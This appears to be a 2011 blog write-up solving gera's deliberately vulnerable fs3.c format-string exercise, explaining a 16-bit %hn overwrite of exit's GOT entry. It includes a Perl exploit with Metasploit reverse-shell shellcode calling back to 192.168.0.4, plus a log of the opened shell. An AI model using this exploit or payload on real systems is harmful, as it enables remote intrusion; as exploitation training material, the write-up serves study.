Wednesday, November 9, 2011

Format Strings: fs3

gera's Insecure Programming fs3.c:

/* fs3.c *
 * specially crafted to feed your brain by riq@core-sdi.com */

/* Not enough resources? */

#include <stdio.h>   /* snprintf */
#include <stdlib.h>  /* exit */

/* argv/argc are swapped as in gera's original; argc[1] is the first argument */
int main(int argv,char **argc) {
char buf[256];

/* one argument supplied, four consumed: %c, %c and %hn read stack slots past argc[1] */
snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
exit(0);
}


This is much the same as fs2 except that there is only one snprintf, so only one write is available. A %hn stores the character count as a 16-bit short, which means exactly 2 bytes can be overwritten rather than a full 4-byte address. The format string also names three arguments (%c, %c, %hn) that were never passed, so snprintf reads them from the stack slots that follow argc[1]; in this binary those slots are the start of buf itself, so the first bytes of the copied argv[1] become the two %c arguments and the pointer that %hn writes through. Compiling with gcc -Wall (-Wformat) warns about the missing arguments, which is the check that would have caught this.

The GOT (objdump -R) looks like this:

fs3: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0804958c R_386_GLOB_DAT __gmon_start__
08049574 R_386_JUMP_SLOT __register_frame_info
08049578 R_386_JUMP_SLOT __deregister_frame_info
0804957c R_386_JUMP_SLOT __libc_start_main
08049580 R_386_JUMP_SLOT __cxa_finalize
08049584 R_386_JUMP_SLOT snprintf
08049588 R_386_JUMP_SLOT exit


exit's GOT entry, the target of the %hn write, currently holds:

(gdb) x/x 0x08049588
0x8049588 <_global_offset_table_>: 0x08048386


Every stack address on this box has 0xbfff as its upper 16 bits (the stack is not randomized here):

(gdb) x/x $esp
0xbffffa00: 0x40016b34


Overwriting only the upper 16 bits of exit's GOT entry with 0xbfff, while the lower 16 bits (0x8386) stay as they are, points the entry into the stack, and a single %hn is enough to do it.

From 0x08048386 to 0xbfff8386

Writing 0xbfff means snprintf must have counted 0xbfff = 49151 characters by the time it reaches the %hn. That is far more than the 256-byte buffer holds, but %n counts the characters that would have been written, not the ones that fit, so the count keeps growing past sizeof buf (hence "Not enough resources?").

I need to make sure 0xbfff8386 falls inside argv[1] and contains a nop slide leading into the shellcode.
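To see the mechanics of the 2-byte partial overwrite and the over-long count without depending on fs3's stack layout, here is an added example of my own (it is not gera's fs3.c and not code from the original post). It passes the %c%c%hn arguments explicitly: a constructed fake_got_exit global stands in for the real GOT slot, and the argument length is chosen so the count reaches 0xbfff when %hn fires. It assumes a little-endian host and glibc-style %n counting, both true on the i386 box above.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Constructed stand-in for exit()'s GOT entry, initialised to the value gdb
 * showed in fs3. Nothing real is patched; this is the only thing written to.
 */
static uint32_t fake_got_exit = 0x08048386;

/*
 * Reproduce the fs3 write with explicit arguments instead of leaked stack slots:
 *   - arg is a string of (target_high - 2) bytes, standing in for argv[1]
 *   - the two %c print one character each, so the counter reaches target_high
 *   - %hn then stores that 16-bit count through hi, which points at the upper
 *     two bytes of the 4-byte slot (little-endian layout, as on i386)
 * Returns snprintf's character count, which keeps growing past sizeof buf
 * because %n counts what would have been written, not what fit, or -1 on
 * allocation failure.
 */
int fs3_partial_overwrite(uint32_t *slot, unsigned short target_high)
{
    char buf[256];                          /* same size as fs3's buffer */
    size_t arglen = (size_t)target_high - 2; /* %c%c supply the last two */
    char *arg = malloc(arglen + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';

    /* +2: skip the low half (0x8386), aim at the high half (0x0804) */
    short *hi = (short *)((unsigned char *)slot + 2);
    int count = snprintf(buf, sizeof buf, "%s%c%c%hn", arg, 'B', 'C', hi);

    free(arg);
    return count;
}

int main(void)
{
    uint32_t before = fake_got_exit;
    int count = fs3_partial_overwrite(&fake_got_exit, 0xbfff);
    printf("count=%d (0x%x), slot 0x%08x -> 0x%08x\n",
           count, (unsigned)count, (unsigned)before, (unsigned)fake_got_exit);
    return 0;
}
```

The returned count is 49151 even though buf only ever receives 255 characters; that gap between what snprintf counts and what it stores is the whole reason a 256-byte buffer can drive a 0xbfff write.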

#!/usr/bin/perl
use strict;
use warnings;

# eight bytes consumed by the two %c specifiers (one 4-byte stack slot each)
my $filler = "A" x 8;

# pointer consumed by %hn: exit()'s GOT entry, offset by 2 so the 16-bit write
# lands on the upper half of the little-endian entry
# 0x08049588 -> 0x0804958a
my $addr = "\x8a\x95\x04\x08";

# shellcode
# msf3 linux/x86/shell_reverse_tcp, LHOST=192.168.0.4, badchars="\x00"
my $shellcode =
"\xba\xbb\x01\x12\x0d\xda\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9" .
"\xb1\x12\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x4e\x30" .
"\xc9\xfa\x53\x60\xae\x57\xf9\x85\xb9\xb9\x4d\xef\x74\xb9" .
"\xf6\xae\xee\x7a\xa0\x4f\xeb\x1c\xd8\x5e\xaf\x86\x4b\x0b" .
"\x5f\x16\x3b\x42\xbe\xdb\xd1\x32\x19\x11\xa5\xe2\x1e\x70" .
"\x15\x2b\xec\x03\x1c\x2d\x17\x53\xf6\xe2\xc8\x27\x6e\x95" .
"\x39\xaa\x07\x0b\xcf\xc9\x87\x80\x46\xec\x97\x2c\x94\x6f";

# pad argv[1] to 8 + 4 + 49137 = 49149 bytes; the two %c characters then bring
# snprintf's count to 49151 = 0xbfff, which %hn writes over the upper half of
# exit's GOT entry
my $nops = "\x90" x (49137 - length($shellcode));

print $filler . $addr . $nops . $shellcode;



msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.38:58803) at 2011-11-09 19:41:02 -0600

id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/fs3

[*] Command shell session 1 closed. Reason: Died from EOFError
